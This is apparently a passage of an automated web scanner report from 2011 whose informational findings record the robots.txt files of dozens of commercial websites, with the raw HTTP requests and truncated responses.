The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cvs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:43 GMT
Server: Apache
Last-Modified: Mon, 06 Dec 2010 21:25:52 GMT
Accept-Ranges: bytes
Content-Length: 28
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:34:43 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /
24.229. http://www.dailyfinance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailyfinance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailyfinance.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 3909
Set-Cookie: JSESSIONID=C26ED679911F6740DD169B20FBC44CF1; Path=/sitemap_df
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive

User-agent: googlebot
Disallow: /historical-prices/
Disallow: /caw/
Disallow: /ukw/
Disallow: /usw/portfolios/
Disallow: /tools/static_c/
Disallow: /portfolios/
Disallow: /lookup/
Disallow: /lookuppop
...[SNIP]...
24.230. http://www.dailykos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailykos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailykos.com

Response

HTTP/1.0 200 OK
Server: lighttpd/1.4.29-devel-2776M
Vary: Accept-Encoding
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:09:30 GMT
Accept-Ranges: bytes
ETag: "2004376725"
Connection: close
Last-Modified: Sun, 13 Feb 2011 09:23:27 GMT
Content-Length: 2420

User-agent: Mediapartners-Google*
Disallow:

User-Agent: Googlebot
#Disallow: /
Disallow: /comments
Disallow: /user
Disallow: /poll
Disallow: /print
Disallow: /search
Disallow: /part
Disallow: /ajax


...[SNIP]...
24.231. http://www.dailymail.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymail.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailymail.co.uk

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-GB
Expires: Sat, 02 Apr 2011 13:43:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:43:54 GMT
Content-Length: 6258
Connection: close
Set-Cookie: JSESSIONID=471A74475C35B52E49346C845D2BE9A6; Path=/


# Robots.txt for http://www.dailymail.co.uk/
# All robots will spider the domain

# Begin standard rules

# Meltwater block
User-agent: Meltwater
Disallow: /

...[SNIP]...
24.232. http://www.dailymotion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dailymotion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dailymotion.com

Response

HTTP/1.1 200 OK
Server: DMS/1.0.42
Vary: Accept-Encoding
Content-Type: text/plain; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sat, 02 Apr 2011 12:43:38 GMT
Keep-Alive: timeout=60, max=4994
X-DM-Cache: DONT
Accept-Ranges: bytes
ETag: "1e42c3-70a-49fc959e0f300"
Connection: close
Last-Modified: Thu, 31 Mar 2011 15:57:32 GMT
Content-Length: 1802

User-agent: *
Disallow: /masscast/
Disallow: /rss/
Disallow: /&tid=generator
Disallow: /edit/
Disallow: /tags/
Disallow: /cdn/
Disallow: /family_filter
Disallow: /pageitem
Disallow: /contacts/
Disallo
...[SNIP]...
24.233. http://www.datehookup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.datehookup.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.datehookup.com

Response

HTTP/1.1 200 OK
Content-Length: 175
Content-Type: text/plain
Last-Modified: Tue, 27 Jul 2010 22:04:09 GMT
Accept-Ranges: bytes
ETag: "703db7a3d72dcb1:171c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:04:44 GMT
Connection: close

User-agent: *
Disallow: /*ga_flow
Disallow: /Send.aspx
Disallow: /send.aspx
Disallow: /1016760/

User-agent: MediaPartners-Google
User-agent: Adsbot-Google
Disallow:
24.234. http://www.deadline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deadline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deadline.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny8
Last-Modified: Fri, 01 Apr 2011 21:25:03 GMT
X-Server-Name: 00-www-adriana
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:52:44 GMT
Content-Length: 224
Connection: close

User-agent: *
Disallow: /print-post/
Disallow: /wp-admin/
   
User-agent: Googlebot-Mobile
Disallow: /
       
Sitemap: http://www-deadline-com.vimg.net/sitemap.xml
Sitemap: http://www-deadline-com.vimg.net/
...[SNIP]...
24.235. http://www.dealer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealer.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 19 May 2010 16:24:52 GMT
ETag: "1b87e6-2b-486f4e5c6dd00"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: text/plain; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Date: Sat, 02 Apr 2011 14:16:55 GMT
Connection: close

User-agent: *
Disallow: /designs/
Allow: /
24.236. http://www.dealtime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dealtime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dealtime.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 02 Apr 2011 13:38:15 GMT
Connection: close

User-agent: *
Disallow: /sdcSeo
Disallow: /*?all
Disallow: /*&all
24.237. http://www.dell.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 3737
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: stop_mobi=; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:07 GMT
Connection: close

User-agent: *
Disallow:
Allow:/*/compare.aspx*s=biz*
Allow:/*/compare.aspx*s=hied*
Allow:/*/compare.aspx*s=hea*
Allow:/*/compare.aspx*s=fed*
Allow:/*/compare.aspx*s=slg*
Allow:/*/compare.aspx*s
...[SNIP]...
24.238. http://www.demdex.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.demdex.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:37 GMT
Server: Apache/2.2.10 (Unix)
Last-Modified: Thu, 09 Dec 2010 16:36:41 GMT
ETag: "33093-1a-496fcd7a9d840"
Accept-Ranges: bytes
Content-Length: 26
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Keep-Alive: timeout=5, max=37
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
24.239. http://www.detnews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.detnews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.detnews.com

Response

HTTP/1.1 200 OK
Content-Length: 908
Content-Type: text/plain
Last-Modified: Mon, 01 Nov 2010 15:27:40 GMT
Accept-Ranges: bytes
ETag: "0fef351d979cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Sat, 02 Apr 2011 14:20:14 GMT
Connection: keep-alive

# Robots.txt
# Be nice.
#
Sitemap: http://detnews.com/sitemap_index.xml
#
User-agent: MSIECrawler
Disallow: /*ARCHIVE*
Disallow: /
#
User-agent: *
Disallow: /*ARCHIVE*
Disallow: /apps/pbcs.
...[SNIP]...
24.240. http://www.deviantart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.deviantart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.deviantart.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:13 GMT
Server: Apache
Last-Modified: Tue, 15 Mar 2011 05:07:29 GMT
ETag: "e00014d-bb-49e7e67a86640"
Accept-Ranges: bytes
Content-Length: 187
_eep-Alive: timeout=45
_onnection: Keep-Alive
Content-Type: text/plain
Connection: close

User-agent: *
Disallow: /users/login
Disallow: /users/wrong-password
Disallow: /users/lost-password/
Disallow: /users/lost-password/process
Disallow: /checkout/
Disallow: /join/step2.php
24.241. http://www.dexknows.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dexknows.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dexknows.com

Response

HTTP/1.0 200 OK
Cteonnt-Length: 278
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 20:17:53 GMT
Cache-Control: private, max-age=982759
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Length: 278
Connection: close

#DexKnows.com --- robots.txt

User-agent: *
Disallow: /search/
Disallow: /local/brands/
Disallow: /_css/
Disallow: /images/
Disallow: /js/
Disallow: /highslide-4.0.10/
Disallow: /notinclude
...[SNIP]...
24.242. http://www.dickssportinggoods.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dickssportinggoods.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 20 May 2008 14:38:16 GMT
ETag: "4bc508-168-44daa6e3b4600"
Accept-Ranges: bytes
Content-Length: 360
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:34:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /search/
Disallow: /searchhandler/
Disallow: /coreg/
Disallow: /cart/
Disallow: /cartHandler/
Disallow: /include/
Disallow: /checkout/
Disallow: /images/
Disallow: /ema
...[SNIP]...
24.243. http://www.digitaldesire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.digitaldesire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.digitaldesire.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 02 Apr 2011 14:05:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Fri, 01 Apr 2011 16:59:08 GMT
Cache-Control: public, max-age=43200
Content-Length: 204
X-Varnish: 333868531 329859227
Age: 15693
Via: 1.1 varnish

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...
24.244. http://www.directbuyvisitorpass.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directbuyvisitorpass.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directbuyvisitorpass.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:08 GMT
Server: Apache
Last-Modified: Thu, 16 Dec 2010 22:23:35 GMT
ETag: "1bd852c-82-4978e8129e7c0"
Accept-Ranges: bytes
Content-Length: 130
Cache-Control: max-age=54000
Expires: Sun, 03 Apr 2011 04:59:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /.svn/
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /locations/
Disallow: /api/
Disallow: /templates/
24.245. http://www.directv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.directv.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 74
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 13:25:11 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: ASPSESSIONIDACQSBBTB=HFBKPMFDFDFNILDEANAKCGIJ; path=/
Set-Cookie: TLTHID=601C20DE4363148F20C29DB1746F265A; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=601C20DE4363148F20C29DB1746F265A; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:11 GMT
Connection: close

User-agent: 008
Disallow: /

User-agent: *
Disallow: /entertainment/
24.246. http://www.discovery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 31 Mar 2009 18:38:18 GMT
ETag: "9bc1c-81-4666e80b4f3d8"
Accept-Ranges: bytes
Content-Length: 129
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:25:18 GMT
Connection: close

User-Agent: *
Allow: /

User-Agent: Googlebot-Image
Allow: /sharks/
Allow: /

User-agent: *
Disallow: /schedule/episode.jsp
24.247. http://www.dishnetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dishnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dishnetwork.com

Response

HTTP/1.1 200 OK
Content-Length: 900
Content-Type: text/plain
Last-Modified: Tue, 15 Jun 2010 22:27:40 GMT
Accept-Ranges: bytes
ETag: "096e7f6d9ccb1:9b3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:27:30 GMT
Connection: close

User-agent: *
Sitemap: http://www.dishnetwork.com/sitemap.xml
Disallow: /about/careers/dish-installer/
Disallow: /aboutus/
Disallow: /allsat/
Disallow: /allsatcart/
Disallow: /App_Code/
Disallo
...[SNIP]...
24.248. http://www.diynetwork.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diynetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diynetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 30 Jun 2009 18:02:00 GMT
Accept-Ranges: bytes
Content-Type: text/plain
X-Pad: avoid browser bug
Content-Length: 542
Date: Sat, 02 Apr 2011 14:03:31 GMT
Connection: close

###############################
#
# diynetwork.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *


# list folders robots are not allowed to index

Disallow: /cr/
Di
...[SNIP]...
24.249. http://www.dmv.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmv.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmv.org

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:43:22 GMT
Keep-Alive: timeout=5, max=40
Expires: Sat, 02 Apr 2011 18:43:22 GMT
Accept-Ranges: bytes
ETag: "308b17-18-4678956d7b400"
Connection: close
Last-Modified: Tue, 14 Apr 2009 20:04:32 GMT
Content-Length: 24

User-agent: *
Disallow:
24.250. http://www.docstoc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docstoc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.docstoc.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 00:39:51 GMT
Accept-Ranges: bytes
ETag: "85f18d2f2e8cb1:0"
serverID: www2
Date: Sat, 02 Apr 2011 13:30:53 GMT
Connection: keep-alive
Content-Length: 674

User-agent: *
Disallow: /*?catID=
Disallow: /*most-commented
Disallow: /*most-recent
Disallow: /*most-viewed
Disallow: /*highest-rated
Disallow: /*most-downloaded
Disallow: /*most-docs-this-wee
...[SNIP]...
24.251. http://www.doctoroz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doctoroz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doctoroz.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain; charset=UTF-8
ETag: "4f0f-511-48afd37d668c0"
Last-Modified: Sat, 10 Jul 2010 00:01:15 GMT
Server: Apache
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:40:47 GMT
Content-Length: 1297
Connection: close

#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html

Sitemap: http:
...[SNIP]...
24.252. http://www.dogpile.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dogpile.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dogpile.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 28 Mar 2011 22:13:06 GMT
Accept-Ranges: bytes
ETag: "0451a5095edcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:40:14 GMT
Connection: close
Content-Length: 151

User-agent: *
Disallow: /info.dogpl/kevmap2/
Disallow: /white-pages/
Disallow: /info.dogpl/white-pages/
Sitemap: http://www.dogpile.com/sitemap.xml
24.253. http://www.doityourself.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doityourself.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doityourself.com

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 24 Mar 2011 22:00:17 GMT
ETag: "aaf69e-3ba-49f419a48de40"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 954
Date: Sat, 02 Apr 2011 13:43:21 GMT
Age: 309691
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerdiy_pool=1004867756.52514.0000; path=/

User-agent: *
Disallow:/smoothy/
Disallow:/assets/

User-agent: URL_Spider_Pro
Disallow: /

User-agent: CherryPicker
Disallow: /

User-agent: EmailCollector
Disallow: /

User-agent: Email
...[SNIP]...
24.254. http://www.domaintools.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.domaintools.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.domaintools.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Powered-By: PHP/5.2.6
Content-Length: 850
Content-Type: text/plain;charset=utf-8
Date: Sat, 02 Apr 2011 13:45:12 GMT
Connection: close

# don't allow to use search tools

User-agent: LinkAider
Disallow: /

User-agent: link.ru
Disallow: /

User-agent: MLBot
Disallow: /

User-agent: Spinn3r
Disallow: /

User-agent: twiceler
Disallow: /

...[SNIP]...
24.255. http://www.dominos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dominos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dominos.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"52-1284682458000"
Last-Modified: Fri, 17 Sep 2010 00:14:18 GMT
Content-Type: text/plain
Content-Length: 52
Date: Sat, 02 Apr 2011 13:53:50 GMT
Connection: close

User-agent: *
Disallow: /home/
Disallow: /order/
24.256. http://www.doubleinks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.doubleinks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.doubleinks.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 14 Apr 2009 02:53:02 GMT
ETag: "d885da-18-4677aede93f80"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-Agent: *
Allow: /

24.257. http://www.dreamstime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dreamstime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dreamstime.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:12:27 GMT
Server: Apache
Last-Modified: Tue, 09 Jun 2009 13:50:14 GMT
ETag: "340012-1b-46beaa35ad180"
Accept-Ranges: bytes
Content-Length: 27
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /

24.258. http://www.driverside.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.driverside.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.driverside.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Server: Apache/2.2.14 (EL)
Last-Modified: Fri, 11 Mar 2011 01:19:32 GMT
ETag: "8de5a1-181-49e2ac1147100"
Accept-Ranges: bytes
Content-Length: 385
Age: 25901
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /privacy
Disallow: /terms
Disallow: /mygarage
Disallow: /buy-or-sell
Disallow: /app
Disallow: /new
Disallow: /repair-estimates
Sitemap: http://www.driverside.com/mmh_si
...[SNIP]...
24.259. http://www.droidforums.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droidforums.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.droidforums.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:48 GMT
Server: Apache
Last-Modified: Wed, 13 Jan 2010 13:35:20 GMT
ETag: "8abec9-250-47d0bd7793600"
Accept-Ranges: bytes
Content-Length: 592
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:54:48 GMT
Connection: close
Content-Type: text/plain

Sitemap: http://www.droidforums.net/forum/sitemap_index.xml.gz

User-agent: Mediapartners-Google
Disallow:
Allow: /*

User-agent: Mediapartners-Google*
Disallow:
Allow: /*

User-agent: *
Disallow: /*-
...[SNIP]...
24.260. http://www.drugs.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drugs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:58 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: User-Agent
Content-Length: 265
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /search_landing.php
Disallow: /interactions-list-drugs.php
Disallow: /yap/
Disallow: /js/
Disallow: /forum/members/


User-agent: Wget
Disallow: /

User-agent: Offline Explorer
...[SNIP]...
24.261. http://www.drugstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drugstore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drugstore.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 816
Content-Type: text/html; charset=utf-8
Expires: Fri, 01 Apr 2011 13:39:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bjj3ibrphmzmxza3xqbej455; path=/; HttpOnly
Set-Cookie: STICKY=SEAWEB018P:88186096F772452EA73A2290DD74ED5F:q4ck2145o0ahi5fjr0mm4jif; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
Set-Cookie: drugstore%2Efish=UserID=B326603FB0D5447EBDAA7158BC29CA1E; domain=.drugstore.com; expires=Thu, 15-Jan-2037 08:00:00 GMT; path=/
P3P: CP=CAO DSP COR CUR ADM DEV TAI PSD IVD CONi OUR DEL OTRo IND
Date: Sat, 02 Apr 2011 13:39:13 GMT
Connection: close
Set-Cookie: BIGipServerdscm_farm=1981065408.0.0000; expires=Sat, 02-Apr-2011 14:39:14 GMT; path=/

Sitemap: http://www.drugstore.com/sitemap.asp?catid=1&SiteMapIndex=true
User-agent: *
Disallow: /cart.asp
Disallow: /list.asp
Disallow: /onorder.asp
Disallow: /checkout/
Disallow: /user/
Disall
...[SNIP]...
24.262. http://www.dslreports.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:03:16 GMT
Content-Type: text/plain
Content-Length: 1436
Last-Modified: Fri, 26 Nov 2010 01:40:49 GMT
Connection: close
Accept-Ranges: bytes

# robots.txt for http://www.dslreports.com
User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /tp
Disallow: /r0/download/
Disallow: /postlist/
Disallow: /gmaps/dslr/
Disallow: /autoc
...[SNIP]...
24.263. http://www.earthlink.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earthlink.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.earthlink.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:53 GMT
Server: elnws
Last-Modified: Fri, 11 Apr 2008 03:57:02 GMT
Accept-Ranges: bytes
Content-Length: 248
Vary: Accept-Encoding
Keep-Alive: timeout=4, max=99
Connection: Keep-Alive
Content-Type: text/plain

# robots.txt for http://www.earthlink.net

User-agent: *

Disallow: /img
Disallow: /i
Disallow: /css
Disallow: /js
Disallow: /error
Disallow: /wifi
Disallow: /wireless
Disallow: /mobile
Disallow: /sa

...[SNIP]...
24.264. http://www.eastbay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eastbay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eastbay.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4e8ff9a931d428bf6388e9b72207adb8:1279659346"
Last-Modified: Tue, 20 Jul 2010 20:55:46 GMT
Accept-Ranges: bytes
Content-Length: 271
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:45:53 GMT
Connection: close
X-N: S

# Modified 03.19.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...
24.265. http://www.eatingwell.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eatingwell.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eatingwell.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 29 Aug 2009 15:48:56 GMT
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
